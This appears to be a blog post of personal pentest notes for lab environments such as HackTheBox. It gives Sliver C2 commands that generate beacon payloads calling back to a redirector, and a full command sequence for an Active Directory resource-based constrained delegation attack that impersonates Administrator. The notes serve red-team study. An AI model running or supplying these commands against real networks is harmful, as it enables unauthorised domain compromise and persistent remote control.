sliver

• 07 April 2026
• pentest,
• sliver,
• c2

random sliver notes that i found useful for hackthebox and other lab environments

profiles

standard exe

profiles new beacon --http <redirector ip> --name http-exe --format exe http-exe

profiles generate http-exe -s /opt/payloads/http.exe

service exe

profiles new beacon --http <redirector ip> --name http-svc --format service http-svc

profiles generate http-svc -s /opt/payloads/http-svc.exe

TTPs

rbcd

to add resource-based constrained delegation, we need WriteAccountRestrictions + control over a computer acc w/ SPN (i.e. account created with MAQ) this assumes MAQ is default of 10

create machine account

c2tc-addmachineaccount -- -accountName ws01 -password P@ssw0rd123!

retrieve machine account sid

sa-ldapsearch -- -query samaccountname=ws01$ -attributes objectsid

add msDS-AllowedToActOnBehalfOfOtherIdentity

if beacon token has WriteAccountRestrictions: execute-assembly /opt/tools/standin.exe -- --computer <rbcd target account> --sid <sid>

OR specify domain credentials: execute-assembly /opt/tools/standin.exe -- --computer <rbcd target account> --sid <sid> --domain <domain> --user <account> --pass <password>

s4u to target spn (e.g. cifs,ldap,http)

rubeus -- s4u /user:ws01$ /rc4:<rc4 hash> /impersonateuser:Administrator /msdsspn:<spn/rbcd target account> /ptt

• ← Previous
  ci/cd dangers